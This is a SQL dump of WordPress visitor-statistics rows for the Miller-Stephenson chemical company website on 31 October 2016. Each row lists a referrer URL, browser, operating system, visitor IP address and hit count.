INSERT INTO `wp_statistics_visitor` VALUES (13957, '2016-10-31', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=1&ved=0ahUKEwiymtqWv4TQAhUJa7wKHfz6B0oQFggZMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fptfe-mold-release-agents%2F&usg=AFQjCNGFoB94k7zmpQPNN_7HmB0CtRspdQ&bvm=bv.137132246,bs.2,d.dGo', 'MSIE', 'Windows', '7.0', '', '125.139.135.144', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13958, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '48.0', '', '195.169.99.212', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13959, '2016-10-31', 'https://www.google.es/', 'Chrome', 'Windows', '54.0.2840.71', '', '84.126.4.215', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13960, '2016-10-31', 'https://www.google.ch/', 'Chrome', 'Windows', '52.0.2743.82', '', '84.227.117.123', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13961, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '47.140.182.180', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13962, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '47.0', '', '47.140.182.180', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13963, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '77.158.58.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13964, '2016-10-31', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '125.209.235.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13965, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '62.84.152.98', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13966, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.115', '', '45.32.131.61', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13967, '2016-10-31', 'https://www.google.fr/', 'Chrome', 'Windows', '54.0.2840.71', '', '90.25.33.121', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13968, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '27.32.62.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13969, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.7', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13970, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13971, '2016-10-31', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwieudTwz4TQAhWBNBQKHRsQDYYQFggjMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Facrylic-conformal-coatings%2F&usg=AFQjCNGpCCEShPCtYtxz81ezu2EE-ksUaA', 'MSIE', 'Windows', '11.0', '', '10.78.24.160', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13972, '2016-10-31', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '87.78.144.151', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13973, '2016-10-31', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '36.0.1985.97', '', '185.158.118.218', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13974, '2016-10-31', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '185.158.118.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13975, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '174.127.83.205', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13976, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.115', '', '104.156.230.231', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13977, '2016-10-31', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwiL65Pw1ITQAhXHvBoKHWVNA4AQjBAIJTAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw&bvm=bv.136811127,d.d2s', 'MSIE', 'Windows', '11.0', '', '217.108.170.8', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13978, '2016-10-31', 'https://www.google.co.in/', 'Chrome', 'Android', '38.0.1025.166', '', '42.111.196.0', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13979, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '1.32.71.144', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13980, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13981, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13982, '2016-10-31', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwj4jpnJ14TQAhUIjFQKHckDAIQQFgg3MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-67-radical-initiator%2F&usg=AFQjCNF6JQqQTvTAJszhPay_5GmxN2I4Hw&bvm=bv.137132246,d.cGw', 'MSIE', 'Windows', '11.0', '', '99.74.244.194', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13983, '2016-10-31', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.11.128.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13984, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '185.69.69.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13985, '2016-10-31', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.1', '', '162.248.147.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13986, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '146.158.186.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13987, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.172', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13988, '2016-10-31', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '537.36', '', '125.209.235.180', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13989, '2016-10-31', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '10.10', '', '79.3.69.168', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13990, '2016-10-31', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13991, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '50.192.56.114', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13992, '2016-10-31', 'https://mmr.mschem.com/miller/pdf/Heloxy.pdf', 'Safari', 'Macintosh', '10.0.1', '', '175.143.15.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13993, '2016-10-31', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.149.80.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13994, '2016-10-31', 'https://www.miller-stephenson.com/products/detail.aspx?itemid=56', 'MSIE', 'Windows', '9.0', '', '182.118.20.214', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13995, '2016-10-31', 'https://www.google.ch/', 'Chrome', 'Windows', '54.0.2840.71', '', '77.58.211.220', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13996, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13997, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.177', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13998, '2016-10-31', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjRwP_v8oTQAhUG7CYKHVmAAssQFgglMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fconformal-coatings%2F&usg=AFQjCNF6BrACSYYrQwxy3XIrHbh4DG7M6A', 'Firefox', 'Windows', '10.0.12', '', '167.186.184.239', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13999, '2016-10-31', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '209.221.240.193', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14000, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '139.5.241.189', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14001, '2016-10-31', 'https://www.google.com.sa/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwjX57Pz9YTQAhUD1BoKHfguCEoQFgguMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-240ab%2F&usg=AFQjCNHkN_6R29TutjS9l-uP6lY6_5YA0A&sig2=GUzsQLLiUHCjAJsWw0quYw', 'MSIE', 'Windows', '11.0', '', '91.208.4.133', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14002, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '199.190.11.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14003, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '35.161.114.135', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14004, '2016-10-31', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '82.152.180.166', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14005, '2016-10-31', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj0-fLK_oTQAhVNZX4KHf2qA4wYABAA&ei=pjEXWKDTIMXJmAH68paYBw&sig=AOD64_2x88J4t3rGYCdRklOSXWyFO3RgXg&rct=j&q=&sqi=2&ved=0ahUKEwigvu3K_oTQAhXFJCYKHXq5BXMQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '198.124.17.20', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14006, '2016-10-31', 'https://www.istmira.ru/', 'Opera', 'Windows', '7.60', '', '178.137.95.202', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14007, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '50.255.131.229', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14008, '2016-10-31', 'https://limtu.ifmo.ru/', 'Opera', 'Windows', '7.60', '', '46.119.118.233', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14009, '2016-10-31', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.248.197.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14010, '2016-10-31', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '199.190.10.24', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14011, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '163.205.238.2', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14012, '2016-10-31', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Chrome', 'Windows', '48.0.2564.116', '', '142.54.183.123', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14013, '2016-10-31', 'https://www.google.co.il/', 'Chrome', 'Windows', '49.0.2623.112', '', '81.218.127.188', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14014, '2016-10-31', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiomtKZhIXQAhWBKCYKHQ3jDKoQFggqMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136811127,d.eWE', 'MSIE', 'Windows', '11.0', '', '173.188.106.116', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14015, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '158.184.198.4', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14016, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.198', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14017, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '93.170.27.37', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14018, '2016-10-31', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '70.88.201.165', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14019, '2016-10-31', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '66.103.245.130', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14020, '2016-10-31', 'https://www.google.nl/', 'Firefox', 'Windows', '49.0', '', '89.146.57.163', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14021, '2016-10-31', 'https://www.openfos.com/supply/4078628-MILLER-STEPHENSON-CHEMICAL-in-DANBURY-CT/', 'Firefox', 'Windows', '50.0', '', '207.244.89.108', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14022, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.11.9600.18499', '', '173.167.26.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14023, '2016-10-31', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '62.109.24.26', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14024, '2016-10-31', 'https://www.miller-stephenson.com/products/detail.aspx?ItemId=64', 'MSIE', 'Windows', '9.0', '', '182.118.25.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14025, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14026, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.7', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14027, '2016-10-31', 'https://www.google.fr/', 'Firefox', 'Windows', '49.0', '', '193.54.90.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14028, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '166.251.190.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14029, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '97.105.182.138', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14030, '2016-10-31', 'https://www.google.fr/', 'Firefox', 'Macintosh', '49.0', '', '176.129.134.35', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14031, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.191', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14032, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14033, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '192.176.1.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14034, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '50.151.36.144', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14035, '2016-10-31', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0ahUKEwi33L6YjoXQAhXCQCYKHbZiCR0QFghIMAc&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-828%2F&usg=AFQjCNG-ULz5hPi_elA0tDheufF5SIOMyg&bvm=bv.136811127,d.eWE', 'MSIE', 'Windows', '11.0', '', '108.189.154.222', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14036, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '67.83.37.83', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14037, '2016-10-31', 'https://gribkovye-zabolevaniya.com/', 'MSIE', 'Unknown', '6.0', '', '176.8.88.141', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14038, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '198.45.182.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14039, '2016-10-31', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '36.0.1985.97', '', '191.101.91.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14040, '2016-10-31', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '191.101.91.15', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14041, '2016-10-31', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjppOqDkoXQAhXE6YMKHbpBBaUQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.137132246,bs.2,d.amc', 'MSIE', 'Windows', '11.0', '', '207.219.230.223', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14042, '2016-10-31', 'https://www.miller-stephenson.com', 'Mechanize', 'Unknown', '2.7.2', '', '54.190.114.62', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14043, '2016-10-31', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1', '', '198.45.182.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14044, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14045, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14046, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '66.150.218.172', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14047, '2016-10-31', 'https://www.google.de/', 'Firefox', 'Windows', '49.0', '', '88.217.225.249', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14048, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '24.63.154.108', '000', 41, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14049, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '45.0', '', '134.223.230.152', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14050, '2016-10-31', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiVyN3blYXQAhXYHIEKHRfHCD0YABAK&sig=AOD64_1O7ub8kcNHhoR5p2sJgCwR0qKqbg&rct=j&q=&ved=0ahUKEwiivdnblYXQAhUBQSYKHf7CAEMQ0QwIMw&adurl=', 'MSIE', 'Windows', '11.0', '', '132.3.45.80', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14051, '2016-10-31', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '132.3.45.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14052, '2016-10-31', 'https://www.miller-stephenson.com/my-account/', 'MSIE', 'Windows', '11.0', '', '132.3.45.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14053, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '66.168.43.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14054, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14055, '2016-10-31', 'https://www.google.ca/', 'Safari', 'iPhone', '10.0', '', '142.177.130.170', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14056, '2016-10-31', 'https://www.google.com.ph/', 'Chrome', 'Windows', '53.0.2785.143', '', '180.190.67.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14057, '2016-10-31', 'https://cse.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '24.142.198.20', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14058, '2016-10-31', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/epoxy-stripping-agent-ms-111/', 'Firefox', 'Windows', '49.0', '', '74.62.85.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14059, '2016-10-31', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwjwjP33mIXQAhWBJCYKHeMDCBcQFgg5MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-477c%2F&usg=AFQjCNFLyqKMKZiyGfxLX9EDgIObI7EPcg&bvm=bv.137132246,d.eWE', 'MSIE', 'Windows', '11.0', '', '173.13.86.93', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14060, '2016-10-31', 'https://1-99seo.com/try.php?u=https://www.miller-stephenson.com', 'Chrome', 'Windows', '32.0.1700.107', '', '87.21.182.85', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14061, '2016-10-31', 'https://www.miller-stephenson.com/notify-SubZero?aHR0cDovL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb20v;Zt8hKUrqXnnwC1vAOLA59i/UZtmEI+L8og30yQ5S72Y=', 'MSIE', 'Windows', '11.0', '', '132.3.45.81', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14062, '2016-10-31', 'https://www.google.com/', 'Safari', 'iPad', '7.0', '', '70.209.140.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14063, '2016-10-31', 'https://search.yahoo.com/', 'Firefox', 'Macintosh', '48.0', '', '96.57.114.58', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14064, '2016-10-31', 'https://www.bing.com/search?q=miller+stephen+krytok+grease+227&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '199.64.6.149', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14065, '2016-10-31', 'https://r.search.yahoo.com/_ylt=AwrSbDXqTxdYR14AM0VXNyoA;_ylu=X3oDMTEyZTBoaTR2BGNvbG8DZ3ExBHBvcwMxBHZ0aWQDQjE5MTBfMQRzZWMDc3I-/RV=2/RE=1477951594/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=wUc7Q4EbDadVYMy9Bbc4zVKJmn8-', 'MSIE', 'Windows', '11.0', '', '108.64.56.147', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14066, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '26.0.1410.65', '', '52.4.244.57', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14067, '2016-10-31', 'https://accessintelligence.imirus.com/Mpowered/book/vche16/i11/p76', 'Chrome', 'Macintosh', '54.0.2840.71', '', '65.118.45.3', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14068, '2016-10-31', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '11.50', '', '54.165.182.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14069, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '40.77.170.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14070, '2016-10-31', 'https://www.google.fr/', 'Chrome', 'Windows', '50.0.2661.75', '', '32.42.40.143', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14071, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14072, '2016-10-31', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '104.163.128.34', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14073, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '45.0', '', '91.57.28.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14074, '2016-10-31', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '208.163.173.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14075, '2016-10-31', 'https://www.google.com/url?url=https://www.miller-stephenson.com/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwjG3-Gpn4XQAhWJhFQKHU2CCqEQFggUMAA&usg=AFQjCNHVMV3tSuqMIrrBe8ycLmdO3Xacdw', 'MSIE', 'Windows', '8.0', '', '198.199.203.245', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14076, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '146.209.224.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14077, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '199.64.7.57', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14078, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '164.138.81.10', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14079, '2016-10-31', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '198.52.59.6', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14080, '2016-10-31', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&cad=rja&uact=8&ved=0ahUKEwjsvovZoIXQAhXE5SYKHYIvBD4QFgg1MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-828%2F&usg=AFQjCNG-ULz5hPi_elA0tDheufF5SIOMyg&bvm=bv.137132246,d.eWE', 'MSIE', 'Windows', '11.0', '', '134.223.116.154', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14081, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '104.36.138.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14082, '2016-10-31', 'https://www.google.fr/', 'Firefox', 'Windows', '49.0', '', '193.253.193.119', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14083, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '32.217.38.78', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14084, '2016-10-31', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '50.78.202.1', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14085, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.5', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14086, '2016-10-31', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwjt06SBpYXQAhVDRCYKHSdPD8EQFgg8MAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox-automotive-lubricants%2F&usg=AFQjCNESe5JES73PhPXioSt0HeUPTwM3_g', 'MSIE', 'Windows', '11.0', '', '70.182.107.8', '000', 9, 0); 
